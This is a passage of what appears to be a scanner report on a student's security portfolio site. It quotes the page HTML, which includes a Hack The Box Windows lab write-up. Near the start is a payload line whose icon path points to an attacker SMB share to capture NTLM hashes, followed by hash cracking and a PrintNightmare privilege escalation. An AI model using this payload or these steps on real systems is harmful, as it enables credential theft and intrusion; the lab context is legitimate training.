                                              Iconfile=\\10.10.14.161\share\test.ico
                                              [Taskbar]
                                              Command=ToggleDesktop
                                          </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_windows/ResponderOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ResponderOutput.png" alt=""></a>
          <p>I created a payload like the example given on the site I found started responder and got
          a few hits. Now we know the username and maybe the password if we manage to crack
          it. We know from the responder output that it is a NTLM hash so lets put Hashcat on it
          and see what we'll get.</p>
          <a href="img/portfolio/minor/red/htb_windows/HashcatOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/HashcatOutput.png" alt=""></a>
          <p>Hashcat cracked the password with ease and now we can take a look at the SMB folder to
          see if we can find anything interesting.</p>
          <a href="img/portfolio/minor/red/htb_windows/SMBMap.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SMBMap.png" alt=""></a>
          <p>We didn't find anything interesting but knowing from the NMap output we also know that
          the RDP port is open so maybe it uses the same password.</p>
          <a href="img/portfolio/minor/red/htb_windows/UserFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/UserFlag.png" alt=""></a>
          <p>This was indeed the case and now we already have the user flag. For priv esc running at
          least WinPEAS is a no-brainer. So I used SimpleHTTPServer to get WinPEAS on the target
          machine.</p>
          <a href="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/SimpleHTTPServer.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/WgetWinpeas.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetWinpeas.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/ProcessPrintSpool.png" alt=""></a>
          <p>Really the only interesting thing WinPEAS found was a Print spooler process. After some
          Googling I stubled across <a href="https://github.com/calebstewart/CVE-2021-1675">this</a> CVE. So lets get
          that exploit on the target machine in the same way we did with WinPEAS.</p>
          <a href="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/WgetPrintNightmare.png" alt=""></a>
          <p>I wasn't able to run the script because of some permission issues, but after some
          Googling I found out I could just set the policy to unrestricted.</p>
          <a href="img/portfolio/minor/red/htb_windows/RunExploit.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RunExploit.png" alt=""></a>
          <p>I ran the exploit and it created a new administrator account for me with a username and
          password that I chose and know. Now the only thing that's left is just to logout as this
           user and login with our new user.</p>
          <a href="img/portfolio/minor/red/htb_windows/RootFlag.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_windows/RootFlag.png" alt=""></a>
          <p>And that's it! We have the root flag! This box wasn't that hard but still fun and
          sometimes challenging due to my lack of knowledge of Windows hacking. Overall a fun
          learning experience.</p>
          <ul class="list-inline">
          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          908189033
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        24. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          998027574, which evaluates to: 2001-08-17 07:52:54

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
